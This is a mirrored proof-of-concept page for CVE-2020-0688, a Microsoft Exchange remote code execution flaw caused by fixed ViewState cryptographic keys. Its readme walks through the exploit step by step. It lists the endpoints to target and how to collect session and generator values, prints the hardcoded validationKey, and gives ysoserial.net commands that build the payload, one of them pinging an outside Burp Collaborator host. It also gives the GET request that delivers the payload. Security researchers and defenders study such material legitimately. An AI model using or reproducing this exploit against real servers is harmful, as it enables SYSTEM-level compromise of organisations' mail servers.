CVE-2020-0688 PoC — Microsoft Exchange Server 授权问题漏洞

Source

https://github.com/murataydemir/CVE-2020-0688

Associated Vulnerability

Title:Microsoft Exchange Server 授权问题漏洞 (CVE-2020-0688)
Description:Microsoft Exchange Server是美国微软（Microsoft）公司的一套电子邮件服务程序。它提供邮件存取、储存、转发，语音邮件，邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞，该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响：Microsoft Exchange Server 2010，Microsoft Exchange Server 2013，Micro

Description

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

Readme

<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same `validationKey` and `decryptionKey` values in web.config. Thus, an <i>authenticated</i> attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs as SYSTEM privileges.

<b>Step 1:</b> Visit one of the following endpoints and access to authentication page
- [x] http(s)://exchangeserver/owa<br>
- [x] http(s)://exchangeserver/owa/auth.owa<br>
- [x] http(s)://exchangeserver/owa/auth/logon.aspx</br>
- [x] http(s)://exchangeserver/ecp<br>
- [x] http(s)://exchangeserver/ecp/default.aspx

<b>Step 2:</b> Login with credential (no matter user account privileges), and get valid `ASP_NET_SessionId` and `__VIEWSTATEGENERATOR` values from HTTP response Cookie and HTTP response body respectively. For example

- [x] <b>ASP_NET_SessionId:</b> 05ae4b41-51e1-4c3a-9241-6b87b169d663<br>
- [x] <b>__VIEWSTATEGENERATOR:</b> B97B4E27<br>
- [x] <b>validationKey (Fixed):</b> CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF<br>
- [x] <b>validationalg (Fixed):</b> SHA1

<b>Step 3:</b> In order to generate payload (to check vuln.), use [YSoSerial.net](https://github.com/pwntester/ysoserial.net)

Note that if you have access to victim exchange server, you can use the following payload which create text file in `C:\` directory as `PoC.txt` name
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```

However, you can't access to server, may following would be better. 
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```

<b>Step 4:</b> After step 4, we'll have had url-encoded ViewState payload. Do GET request at below endpoint as following format

```
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
```

Original blogpost available is [here](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)

File Snapshot


 [4.0K]  /data/pocs/d7090dc340de31dd62768a49d759356493f14d1a
└── [2.9K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!